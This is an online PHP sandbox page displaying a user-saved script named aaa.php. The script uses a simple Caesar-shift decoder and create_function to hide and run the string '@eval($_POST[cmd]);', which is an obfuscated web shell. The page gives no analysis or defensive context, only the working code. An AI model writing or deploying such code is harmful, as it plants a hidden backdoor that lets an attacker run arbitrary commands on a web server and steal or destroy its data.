aaa - PHP Online

Form of PHP Sandbox

Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php in the places where the PHP script should be executed.



Your result can be seen below.

Result of php executing





Full code of aaa.php

  1.  
  2.  
  3. <?php
  4. function decode($string) {
  5.     $result = '';
  6.     for($index=0;$index<strlen($string);$index += 1) {
  7.         $result .= chr(ord($string[$index])-3);
  8.     }
  9.     return $result;
  10. }
  11. $b = create_function('',decode("Chydo+'bSRVW^fpg`,>"));
  12. $b();
  13.  
  14. decode("Chydo+'bSRVW^fpg`,>")
  15.  
  16. ?>
File Description
  • aaa
  • PHP Code
  • 26 Aug-2022
  • 295 Bytes
You can Share it: